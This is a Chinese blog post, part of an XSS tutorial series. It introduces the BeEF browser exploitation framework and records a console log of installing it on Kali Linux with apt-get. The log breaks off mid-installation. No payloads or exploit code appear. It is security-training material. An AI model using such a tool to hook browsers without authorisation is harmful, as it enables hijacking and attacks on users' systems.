0
点赞
收藏
分享

微信扫一扫

【XSS漏洞06】神器beEF的安装与简介

两岁时就很帅 2022-02-26 阅读 56

目录

1 beEF简介

  1. BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。
  2. 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。 BeEF 将挂钩一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,进一步攻击浏览器系统。

2 beEF安装

  1. 新版kali里面没有自带该软件,需要安装,安装前请确保kali虚拟机能正常上网。使用安装命令apt-get install beef-xss,安装过程如下,在接近结束时,提示有几个包没能安装。
┌──(root💀kali)-[~]
└─# apt-get install beef-xss
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
将会同时安装下列软件:
  espeak espeak-data geoipupdate ghostscript gsfonts imagemagick imagemagick-6.q16 lame libespeak1 libgs9 libgs9-common libhttp-parser2.9
  libjs-highlight.js libjs-source-map libjs-uglify libnetpbm10 libnode72 libsonic0 netpbm nodejs nodejs-doc ruby-activemodel ruby-activerecord
  ruby-activesupport ruby-ansi ruby-async ruby-async-dns ruby-async-io ruby-buftok ruby-celluloid ruby-celluloid-io ruby-console ruby-daemons
  ruby-domain-name ruby-em-websocket ruby-equalizer ruby-erubis ruby-espeak ruby-eventmachine ruby-execjs ruby-ffi-compiler ruby-fiber-local ruby-hashie
  ruby-hashie-forbidden-attributes ruby-hitimes ruby-http ruby-http-accept ruby-http-cookie ruby-http-form-data ruby-http-parser ruby-http-parser.rb
  ruby-maxmind-db ruby-memoizable ruby-mojo-magick ruby-msfrpc-client ruby-msgpack ruby-multi-json ruby-multipart-post ruby-mustermann ruby-naught
  ruby-netrc ruby-nio4r ruby-oj ruby-otr-activerecord ruby-parseconfig ruby-qr4r ruby-rack ruby-rack-protection ruby-rest-client ruby-rqrcode-core
  ruby-ruby2-keywords ruby-rubydns ruby-rushover ruby-simple-oauth ruby-sinatra ruby-slack-notifier ruby-sqlite3 ruby-sync ruby-term-ansicolor ruby-tilt
  ruby-timers ruby-tins ruby-twitter ruby-tzinfo ruby-uglifier ruby-unf ruby-unf-ext thin
建议安装:
  mmdb-bin ghostscript-x imagemagick-doc autotrace cups-bsd | lpr | lprng enscript ffmpeg gimp gnuplot grads hp2xx html2ps libwmf-bin mplayer povray
  radiance texlive-base-bin transfig ufraw-batch lame-doc npm ruby-http-parser.rb-doc
下列【新】软件包将被安装:
  beef-xss espeak espeak-data geoipupdate ghostscript gsfonts imagemagick imagemagick-6.q16 lame libespeak1 libhttp-parser2.9 libjs-highlight.js
  libjs-source-map libjs-uglify libnetpbm10 libnode72 libsonic0 netpbm nodejs nodejs-doc ruby-activemodel ruby-activerecord ruby-ansi ruby-async
  ruby-async-dns ruby-async-io ruby-buftok ruby-celluloid ruby-celluloid-io ruby-console ruby-daemons ruby-domain-name ruby-em-websocket ruby-equalizer
  ruby-erubis ruby-espeak ruby-eventmachine ruby-execjs ruby-ffi-compiler ruby-fiber-local ruby-hashie ruby-hashie-forbidden-attributes ruby-hitimes
  ruby-http ruby-http-accept ruby-http-cookie ruby-http-form-data ruby-http-parser ruby-http-parser.rb ruby-maxmind-db ruby-memoizable ruby-mojo-magick
  ruby-msfrpc-client ruby-msgpack ruby-multi-json ruby-multipart-post ruby-mustermann ruby-naught ruby-netrc ruby-nio4r ruby-oj ruby-otr-activerecord
  ruby-parseconfig ruby-qr4r ruby-rack ruby-rack-protection ruby-rest-client ruby-rqrcode-core ruby-ruby2-keywords ruby-rubydns ruby-rushover
  ruby-simple-oauth ruby-sinatra ruby-slack-notifier ruby-sqlite3 ruby-sync ruby-term-ansicolor ruby-tilt ruby-timers ruby-tins ruby-twitter
  ruby-uglifier ruby-unf ruby-unf-ext thin
下列软件包将被升级:
  libgs9 libgs9-common ruby-activesupport ruby-tzinfo
升级了 4 个软件包,新安装了 85 个软件包,要卸载 0 个软件包,有 366 个软件包未被升级。
需要下载 29.5 MB 的归档。
解压缩后会消耗 108 MB 的额外空间。
您希望继续执行吗? [Y/n] y
获取:1 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-ansi all 1.5.0-1.1 [36.0 kB]
获取:2 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-fiber-local all 1.0.0-2 [3,384 B]
获取:3 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-console all 1.10.1-2 [10.9 kB]
获取:4 http://http.kali.org/kali kali-rolling/main amd64 ruby-nio4r amd64 2.5.8-1+b1 [64.2 kB]
获取:5 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-hitimes amd64 1.3.1-1 [24.1 kB]
获取:6 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-timers all 4.1.1-2.1 [8,592 B]
获取:7 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-async all 1.30.1-1 [15.6 kB]
获取:8 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-async-io all 1.32.2-1 [16.1 kB]
获取:9 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-async-dns all 1.2.5-0kali1 [15.1 kB]
获取:10 http://http.kali.org/kali kali-rolling/main amd64 ruby-eventmachine amd64 1.3~pre20201020-b50c135-4+b1 [177 kB]
获取:11 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libhttp-parser2.9 amd64 2.9.4-4 [22.1 kB]
忽略:12 http://http.kali.org/kali kali-rolling/main amd64 ruby-http-parser.rb amd64 0.6.0-6+b1
获取:13 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-em-websocket all 0.5.1-2 [19.4 kB]
错误:26 http://http.kali.org/kali kali-rolling/main amd64 ruby-msgpack amd64 1.4.2-1
  404  Not Found [IP: 192.99.200.113 80]
获取:14 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-erubis all 2.7.0-3.1 [94.5 kB]
获取:15 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libsonic0 amd64 0.2.0-11 [11.0 kB]
获取:16 http://http.kali.org/kali kali-rolling/main amd64 espeak-data amd64 1.48.15+dfsg-3 [1,011 kB]
获取:17 http://http.kali.org/kali kali-rolling/main amd64 libespeak1 amd64 1.48.15+dfsg-3 [158 kB]
获取:18 http://http.kali.org/kali kali-rolling/main amd64 espeak amd64 1.48.15+dfsg-3 [72.2 kB]
获取:19 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 lame amd64 3.100-3 [281 kB]
获取:20 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-espeak all 1.0.5-1 [5,600 B]
获取:21 http://http.kali.org/kali kali-rolling/main amd64 libnode72 amd64 12.22.7~dfsg-2 [8,348 kB]
错误:71 http://http.kali.org/kali kali-rolling/main amd64 ruby-multipart-post all 2.0.0-1                                                                 
  404  Not Found [IP: 192.99.200.113 80]
错误:80 http://http.kali.org/kali kali-rolling/main amd64 beef-xss all 0.5.4.0-0kali1                                                                     
  404  Not Found [IP: 192.99.200.113 80]
获取:22 http://http.kali.org/kali kali-rolling/main amd64 nodejs amd64 12.22.7~dfsg-2 [147 kB]                                                            
获取:23 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-multi-json all 1.14.1-1 [21.0 kB]                                                 
获取:24 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-execjs all 2.8.1-1 [16.1 kB]                                                      
获取:25 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-maxmind-db all 1.1.1-0kali1 [11.7 kB]                                             
获取:27 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-msfrpc-client all 1.1.2-2 [6,204 B]                                               
获取:28 http://http.kali.org/kali kali-rolling/main amd64 ruby-activesupport all 2:6.1.4.1+dfsg-8 [204 kB]                                                
获取:29 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-tzinfo all 2.0.4-3 [68.1 kB]                                                      
获取:30 http://http.kali.org/kali kali-rolling/main amd64 ruby-activemodel all 2:6.1.4.1+dfsg-8 [72.9 kB]                                                 
获取:31 http://http.kali.org/kali kali-rolling/main amd64 ruby-activerecord all 2:6.1.4.1+dfsg-8 [366 kB]                                                 
获取:32 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-hashie all 3.5.5-3 [39.6 kB]                                                      
获取:33 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-hashie-forbidden-attributes all 0.1.1-1.1 [3,776 B]                               
获取:34 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-otr-activerecord all 2.0.3-3 [16.3 kB]                                            
获取:35 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-parseconfig all 1.0.8-1 [7,608 B]                                                 
获取:36 http://http.kali.org/kali kali-rolling/main amd64 imagemagick-6.q16 amd64 8:6.9.11.60+dfsg-1.3 [383 kB]                                           
获取:37 http://http.kali.org/kali kali-rolling/main amd64 imagemagick amd64 8:6.9.11.60+dfsg-1.3 [166 kB]                                                 
获取:38 http://http.kali.org/kali kali-rolling/main amd64 gsfonts all 1:8.11+urwcyr1.0.7~pre44-4.5 [3,125 kB]                                             
获取:39 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-mojo-magick all 0.5.6-2 [13.4 kB]                                                 
获取:40 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rqrcode-core all 0.1.2-1 [13.7 kB]                                                
获取:41 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-qr4r all 0.4.1-2 [6,224 B]                                                        
获取:42 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rack all 2.1.4-4 [85.7 kB]                                                        
获取:43 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rack-protection all 2.0.8.1-2 [37.1 kB]                                           
获取:44 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-celluloid all 0.16.0-5 [40.2 kB]                                                  
获取:45 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-celluloid-io all 0.16.2-5 [15.6 kB]                                               
获取:46 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rubydns all 1.0.3-3 [28.5 kB]                                                     
获取:47 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http-accept all 1.7.0-2 [9,516 B]                                                 
获取:48 http://http.kali.org/kali kali-rolling/main amd64 ruby-unf-ext amd64 0.0.7.7-1+b1 [92.6 kB]                                                       
获取:49 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-unf all 0.1.4-2 [4,928 B]                                                         
获取:50 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-domain-name all 0.5.20190701-1 [44.6 kB]                                          
获取:51 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http-cookie all 1.0.3-1 [22.6 kB]                                                 
获取:52 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-netrc all 0.11.0-3 [7,020 B]                                                      
获取:53 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rest-client all 2.1.0-1 [47.6 kB]                                                 
获取:54 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-rushover all 0.3.0-2 [4,956 B]                                                    
获取:55 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-ruby2-keywords all 0.0.5-1 [4,300 B]                                              
获取:56 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-mustermann all 1.1.1-1 [33.6 kB]                                                  
获取:57 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-tilt all 2.0.10-2 [28.8 kB]                                                       
获取:58 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-sinatra all 2.0.8.1-2 [351 kB]                                                    
获取:59 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-slack-notifier all 1.5.1-2 [4,640 B]                                              
获取:60 http://http.kali.org/kali kali-rolling/main amd64 ruby-sqlite3 amd64 1.4.2-3+b1 [53.9 kB]                                                         
获取:61 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-sync all 0.5.0-2 [5,540 B]                                                        
获取:62 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-tins all 1.1.0-2 [27.1 kB]                                                        
获取:63 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-term-ansicolor all 1.3.0-1.1 [14.4 kB]                                            
获取:64 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-buftok all 0.2.0-2 [5,992 B]                                                      
获取:65 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-equalizer all 0.0.11-2 [5,248 B]                                                  
获取:66 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http-form-data all 2.2.0-1 [9,440 B]                                              
获取:67 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-ffi-compiler all 1.0.1-4 [7,992 B]                                                
获取:68 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http-parser amd64 1.2.1-5 [20.2 kB]                                               
忽略:69 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http all 4.4.1-5                                                                  
获取:70 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-memoizable all 0.4.2-2 [7,248 B]                                                  
获取:72 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-naught all 1.1.0-1 [12.0 kB]                                                      
获取:73 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-simple-oauth all 0.3.1-2.1 [5,624 B]                                              
获取:74 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-twitter all 7.0.0-1 [74.5 kB]   
获取:75 http://http.kali.org/kali kali-rolling/main amd64 libjs-source-map all 0.7.0++dfsg2+really.0.6.1
获取:76 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libjs-uglify all 2.8.29-8 [68.4 kB]  
获取:77 http://http.kali.org/kali kali-rolling/main amd64 ruby-uglifier all 2.7.2+dfsg-2 [15.1 kB]      
获取:78 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-daemons all 1.1.9-2.1 [21.9 kB] 
获取:79 http://http.kali.org/kali kali-rolling/main amd64 thin amd64 1.8.0-1+b1 [65.4 kB]               
获取:81 http://http.kali.org/kali kali-rolling/contrib amd64 geoipupdate amd64 4.6.0-1+b3 [1,770 kB]    
获取:82 http://http.kali.org/kali kali-rolling/main amd64 libgs9 amd64 9.55.0~dfsg-3 [2,527 kB]         
获取:83 http://http.kali.org/kali kali-rolling/main amd64 libgs9-common all 9.55.0~dfsg-3 [745 kB]      
获取:84 http://http.kali.org/kali kali-rolling/main amd64 ghostscript amd64 9.55.0~dfsg-3 [98.8 kB]     
获取:85 http://http.kali.org/kali kali-rolling/main amd64 libjs-highlight.js all 9.18.5+dfsg1-1 [397 kB]
获取:86 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 libnetpbm10 amd64 2:10.0-15.4 [86.2 k
获取:87 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 netpbm amd64 2:10.0-15.4 [1,011 kB]  
获取:88 http://http.kali.org/kali kali-rolling/main amd64 nodejs-doc all 12.22.7~dfsg-2 [2,545 kB]      
获取:89 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-oj amd64 3.13.9-1 [228 kB]      
获取:12 http://http.kali.org/kali kali-rolling/main amd64 ruby-http-parser.rb amd64 0.6.0-6+b1 [14.4 kB]
获取:69 http://mirrors.neusoft.edu.cn/kali kali-rolling/main amd64 ruby-http all 4.4.1-5 [38.5 kB]      
已下载 25.9 MB,耗时 20(1,329 kB/s)                                                                  
E: 无法下载 http://http.kali.org/kali/pool/main/r/ruby-msgpack/ruby-msgpack_1.4.2-1_amd64.deb  404  Not 
E: 无法下载 http://http.kali.org/kali/pool/main/r/ruby-multipart-post/ruby-multipart-post_2.0.0-1_all.de
E: 无法下载 http://http.kali.org/kali/pool/main/b/beef-xss/beef-xss_0.5.4.0-0kali1_all.deb  404  Not Fou
E: 有几个软件包无法下载,要不运行 apt-get update 或者加上 --fix-missing 的选项再试试?
  1. 根据提示,使用命令apt-get update
┌──(root💀kali)-[/]
└─# apt-get update                                                                                                                                   127 ⨯
获取:1 http://kali.download/kali kali-rolling InRelease [30.6 kB]
获取:2 http://kali.download/kali kali-rolling/main amd64 Packages [18.0 MB]
获取:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [40.9 MB]                                                                         
忽略:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb)                                                                                   
获取:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [106 kB]                                                                             
获取:5 http://kali.download/kali kali-rolling/contrib amd64 Contents (deb) [128 kB]                                                                       
获取:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [176 kB]                                                                            
获取:7 http://kali.download/kali kali-rolling/non-free amd64 Contents (deb) [945 kB]                                                                      
获取:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [40.9 MB]                                                                         
已下载 21.1 MB,耗时 283(12.5 kB/s)                                                                                                                 
正在读取软件包列表... 完成
  1. 再次使用命令安装apt-get install beef-xss,执行过程如下,成功安装,在安装过程中有弹出询问是否重启的,选择是。
┌──(root💀kali)-[/]
└─# apt-get install beef-xss                                                                                                                         130 ⨯
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成                 
将会同时安装下列软件:
  espeak espeak-data geoipupdate ghostscript gsfonts imagemagick imagemagick-6.q16 lame libc-bin libc-dev-bin libc-l10n libc6 libc6-dev libc6-i386
  libespeak1 libgs9 libgs9-common libhttp-parser2.9 libjs-highlight.js libjs-source-map libjs-uglify libnetpbm10 libnode72 libsonic0 locales netpbm
  nodejs nodejs-doc ruby-activemodel ruby-activerecord ruby-activesupport ruby-ansi ruby-async ruby-async-dns ruby-async-io ruby-buftok ruby-celluloid
  ruby-celluloid-io ruby-console ruby-daemons ruby-domain-name ruby-em-websocket ruby-equalizer ruby-erubis ruby-espeak ruby-eventmachine ruby-execjs
  ruby-ffi-compiler ruby-fiber-local ruby-hashie ruby-hashie-forbidden-attributes ruby-hitimes ruby-http ruby-http-accept ruby-http-cookie
  ruby-http-form-data ruby-http-parser ruby-http-parser.rb ruby-maxmind-db ruby-memoizable ruby-mojo-magick ruby-msfrpc-client ruby-msgpack
  ruby-multi-json ruby-multipart-post ruby-mustermann ruby-naught ruby-netrc ruby-nio4r ruby-oj ruby-otr-activerecord ruby-parseconfig ruby-qr4r
  ruby-rack ruby-rack-protection ruby-rest-client ruby-rqrcode-core ruby-ruby2-keywords ruby-rubydns ruby-rushover ruby-simple-oauth ruby-sinatra
  ruby-slack-notifier ruby-sqlite3 ruby-sync ruby-term-ansicolor ruby-tilt ruby-timers ruby-tins ruby-twitter ruby-tzinfo ruby-uglifier ruby-unf
  ruby-unf-ext thin
建议安装:
  mmdb-bin ghostscript-x imagemagick-doc autotrace cups-bsd | lpr | lprng enscript ffmpeg gimp gnuplot grads hp2xx html2ps libwmf-bin mplayer povray
  radiance texlive-base-bin transfig ufraw-batch lame-doc glibc-doc libnss-nis libnss-nisplus manpages-dev npm ruby-http-parser.rb-doc
推荐安装:
  manpages-dev libc-devtools
下列【新】软件包将被安装:
  beef-xss espeak espeak-data geoipupdate ghostscript gsfonts imagemagick imagemagick-6.q16 lame libespeak1 libhttp-parser2.9 libjs-highlight.js
  libjs-source-map libjs-uglify libnetpbm10 libnode72 libsonic0 netpbm nodejs nodejs-doc ruby-activemodel ruby-activerecord ruby-ansi ruby-async
  ruby-async-dns ruby-async-io ruby-buftok ruby-celluloid ruby-celluloid-io ruby-console ruby-daemons ruby-domain-name ruby-em-websocket ruby-equalizer
  ruby-erubis ruby-espeak ruby-eventmachine ruby-execjs ruby-ffi-compiler ruby-fiber-local ruby-hashie ruby-hashie-forbidden-attributes ruby-hitimes
  ruby-http ruby-http-accept ruby-http-cookie ruby-http-form-data ruby-http-parser ruby-http-parser.rb ruby-maxmind-db ruby-memoizable ruby-mojo-magick
  ruby-msfrpc-client ruby-msgpack ruby-multi-json ruby-multipart-post ruby-mustermann ruby-naught ruby-netrc ruby-nio4r ruby-oj ruby-otr-activerecord
  ruby-parseconfig ruby-qr4r ruby-rack ruby-rack-protection ruby-rest-client ruby-rqrcode-core ruby-ruby2-keywords ruby-rubydns ruby-rushover
  ruby-simple-oauth ruby-sinatra ruby-slack-notifier ruby-sqlite3 ruby-sync ruby-term-ansicolor ruby-tilt ruby-timers ruby-tins ruby-twitter
  ruby-uglifier ruby-unf ruby-unf-ext thin
下列软件包将被升级:
  libc-bin libc-dev-bin libc-l10n libc6 libc6-dev libc6-i386 libgs9 libgs9-common locales ruby-activesupport ruby-tzinfo
升级了 11 个软件包,新安装了 85 个软件包,要卸载 0 个软件包,有 934 个软件包未被升级。
需要下载 29.3 MB/43.4 MB 的归档。
解压缩后会消耗 109 MB 的额外空间。
您希望继续执行吗? [Y/n] y
获取:1 http://kali.download/kali kali-rolling/main amd64 libc-l10n all 2.33-6 [865 kB]
获取:2 http://kali.download/kali kali-rolling/main amd64 libc-dev-bin amd64 2.33-6 [243 kB]
获取:3 http://kali.download/kali kali-rolling/main amd64 libc6-dev amd64 2.33-6 [2,290 kB]
获取:4 http://kali.download/kali kali-rolling/main amd64 libc6-i386 amd64 2.33-6 [2,638 kB]
获取:5 http://kali.download/kali kali-rolling/main amd64 locales all 2.33-6 [4,090 kB]
获取:6 http://kali.download/kali kali-rolling/main amd64 libc6 amd64 2.33-6 [2,842 kB]
获取:7 http://kali.download/kali kali-rolling/main amd64 libc-bin amd64 2.33-6 [846 kB]                                                                   
获取:8 http://kali.download/kali kali-rolling/main amd64 ruby-nio4r amd64 2.5.8-2 [133 kB]                                                                
获取:9 http://http.kali.org/kali kali-rolling/main amd64 libnode72 amd64 12.22.9~dfsg-1 [8,359 kB]                                                        
获取:10 http://http.kali.org/kali kali-rolling/main amd64 nodejs amd64 12.22.9~dfsg-1 [147 kB]                                                            
获取:11 http://http.kali.org/kali kali-rolling/main amd64 ruby-msgpack amd64 1.4.2-2+b1 [74.8 kB]                                                         
获取:12 http://kali.download/kali kali-rolling/main amd64 ruby-hashie all 3.5.5-4 [39.3 kB]                                                               
获取:13 http://http.kali.org/kali kali-rolling/main amd64 imagemagick-6.q16 amd64 8:6.9.11.60+dfsg-1.3+b1 [383 kB]                                        
获取:14 http://http.kali.org/kali kali-rolling/main amd64 imagemagick amd64 8:6.9.11.60+dfsg-1.3+b1 [166 kB]                                              
获取:15 http://kali.download/kali kali-rolling/main amd64 ruby-rack all 2.2.3-4 [133 kB]                                                                  
获取:16 http://kali.download/kali kali-rolling/main amd64 ruby-sqlite3 amd64 1.4.2-4 [53.7 kB]                                                            
获取:17 http://kali.download/kali kali-rolling/main amd64 ruby-multipart-post all 2.0.0-2 [7,928 B]                                                       
获取:18 http://kali.download/kali kali-rolling/main amd64 beef-xss all 0.5.4.0-0kali2 [3,549 kB]                                                          
获取:19 http://http.kali.org/kali kali-rolling/main amd64 nodejs-doc all 12.22.9~dfsg-1 [2,444 kB]                                                        
已下载 29.3 MB,耗时 9(3,389 kB/s)                                                                                                                     
正在从软件包中解出模板:100%
正在预设定软件包 ...
(正在读取数据库 ... 系统当前共安装有 268333 个文件和目录。)
准备解压 .../0-libc-l10n_2.33-6_all.deb  ...
正在解压 libc-l10n (2.33-6) 并覆盖 (2.32-4) ...
准备解压 .../1-libc-dev-bin_2.33-6_amd64.deb  ...
正在解压 libc-dev-bin (2.33-6) 并覆盖 (2.32-4) ...
准备解压 .../2-libc6-dev_2.33-6_amd64.deb  ...
正在解压 libc6-dev:amd64 (2.33-6) 并覆盖 (2.32-4) ...
准备解压 .../3-libc6-i386_2.33-6_amd64.deb  ...
正在解压 libc6-i386 (2.33-6) 并覆盖 (2.32-4) ...
准备解压 .../4-locales_2.33-6_all.deb  ...
正在解压 locales (2.33-6) 并覆盖 (2.32-4) ...
准备解压 .../5-libc6_2.33-6_amd64.deb  ...
Checking for services that may need to be restarted...
Checking init scripts...
正在解压 libc6:amd64 (2.33-6) 并覆盖 (2.32-4) ...
正在设置 libc6:amd64 (2.33-6) ...
Checking for services that may need to be restarted...
Checking init scripts...

Restarting services possibly affected by the upgrade:
  cron: restarting...done.

Services restarted successfully.
(正在读取数据库 ... 系统当前共安装有 268339 个文件和目录。)
准备解压 .../libc-bin_2.33-6_amd64.deb  ...
正在解压 libc-bin (2.33-6) 并覆盖 (2.32-4) ...
正在设置 libc-bin (2.33-6) ...
正在选中未选择的软件包 ruby-ansi。
(正在读取数据库 ... 系统当前共安装有 268339 个文件和目录。)
准备解压 .../00-ruby-ansi_1.5.0-1.1_all.deb  ...
正在解压 ruby-ansi (1.5.0-1.1) ...
正在选中未选择的软件包 ruby-fiber-local。
准备解压 .../01-ruby-fiber-local_1.0.0-2_all.deb  ...
正在解压 ruby-fiber-local (1.0.0-2) ...
正在选中未选择的软件包 ruby-console。
准备解压 .../02-ruby-console_1.10.1-2_all.deb  ...
正在解压 ruby-console (1.10.1-2) ...
正在选中未选择的软件包 ruby-nio4r。
准备解压 .../03-ruby-nio4r_2.5.8-2_amd64.deb  ...
正在解压 ruby-nio4r (2.5.8-2) ...
正在选中未选择的软件包 ruby-hitimes:amd64。
准备解压 .../04-ruby-hitimes_1.3.1-1_amd64.deb  ...
正在解压 ruby-hitimes:amd64 (1.3.1-1) ...
正在选中未选择的软件包 ruby-timers。
准备解压 .../05-ruby-timers_4.1.1-2.1_all.deb  ...
正在解压 ruby-timers (4.1.1-2.1) ...
正在选中未选择的软件包 ruby-async。
准备解压 .../06-ruby-async_1.30.1-1_all.deb  ...
正在解压 ruby-async (1.30.1-1) ...
正在选中未选择的软件包 ruby-async-io。
准备解压 .../07-ruby-async-io_1.32.2-1_all.deb  ...
正在解压 ruby-async-io (1.32.2-1) ...
正在选中未选择的软件包 ruby-async-dns。
准备解压 .../08-ruby-async-dns_1.2.5-0kali1_all.deb  ...
正在解压 ruby-async-dns (1.2.5-0kali1) ...
正在选中未选择的软件包 ruby-eventmachine:amd64。
准备解压 .../09-ruby-eventmachine_1.3~pre20201020-b50c135-4+b1_amd64.deb  ...
正在解压 ruby-eventmachine:amd64 (1.3~pre20201020-b50c135-4+b1) ...
正在选中未选择的软件包 libhttp-parser2.9:amd64。
准备解压 .../10-libhttp-parser2.9_2.9.4-4_amd64.deb  ...
正在解压 libhttp-parser2.9:amd64 (2.9.4-4) ...
正在选中未选择的软件包 ruby-http-parser.rb。
准备解压 .../11-ruby-http-parser.rb_0.6.0-6+b1_amd64.deb  ...
正在解压 ruby-http-parser.rb (0.6.0-6+b1) ...
正在选中未选择的软件包 ruby-em-websocket。
准备解压 .../12-ruby-em-websocket_0.5.1-2_all.deb  ...
正在解压 ruby-em-websocket (0.5.1-2) ...
正在选中未选择的软件包 ruby-erubis。
准备解压 .../13-ruby-erubis_2.7.0-3.1_all.deb  ...
正在解压 ruby-erubis (2.7.0-3.1) ...
正在选中未选择的软件包 libsonic0:amd64。
准备解压 .../14-libsonic0_0.2.0-11_amd64.deb  ...
正在解压 libsonic0:amd64 (0.2.0-11) ...
正在选中未选择的软件包 espeak-data:amd64。
准备解压 .../15-espeak-data_1.48.15+dfsg-3_amd64.deb  ...
正在解压 espeak-data:amd64 (1.48.15+dfsg-3) ...
正在选中未选择的软件包 libespeak1:amd64。
准备解压 .../16-libespeak1_1.48.15+dfsg-3_amd64.deb  ...
正在解压 libespeak1:amd64 (1.48.15+dfsg-3) ...
正在选中未选择的软件包 espeak。
准备解压 .../17-espeak_1.48.15+dfsg-3_amd64.deb  ...
正在解压 espeak (1.48.15+dfsg-3) ...
正在选中未选择的软件包 lame。
准备解压 .../18-lame_3.100-3_amd64.deb  ...
正在解压 lame (3.100-3) ...
正在选中未选择的软件包 ruby-espeak。
准备解压 .../19-ruby-espeak_1.0.5-1_all.deb  ...
正在解压 ruby-espeak (1.0.5-1) ...
正在选中未选择的软件包 libnode72:amd64。
准备解压 .../20-libnode72_12.22.9~dfsg-1_amd64.deb  ...
正在解压 libnode72:amd64 (12.22.9~dfsg-1) ...
正在选中未选择的软件包 nodejs。
准备解压 .../21-nodejs_12.22.9~dfsg-1_amd64.deb  ...
正在解压 nodejs (12.22.9~dfsg-1) ...
正在选中未选择的软件包 ruby-multi-json。
准备解压 .../22-ruby-multi-json_1.14.1-1_all.deb  ...
正在解压 ruby-multi-json (1.14.1-1) ...
正在选中未选择的软件包 ruby-execjs。
准备解压 .../23-ruby-execjs_2.8.1-1_all.deb  ...
正在解压 ruby-execjs (2.8.1-1) ...
正在选中未选择的软件包 ruby-maxmind-db。
准备解压 .../24-ruby-maxmind-db_1.1.1-0kali1_all.deb  ...
正在解压 ruby-maxmind-db (1.1.1-0kali1) ...
正在选中未选择的软件包 ruby-msgpack:amd64。
准备解压 .../25-ruby-msgpack_1.4.2-2+b1_amd64.deb  ...
正在解压 ruby-msgpack:amd64 (1.4.2-2+b1) ...
正在选中未选择的软件包 ruby-msfrpc-client。
准备解压 .../26-ruby-msfrpc-client_1.1.2-2_all.deb  ...
正在解压 ruby-msfrpc-client (1.1.2-2) ...
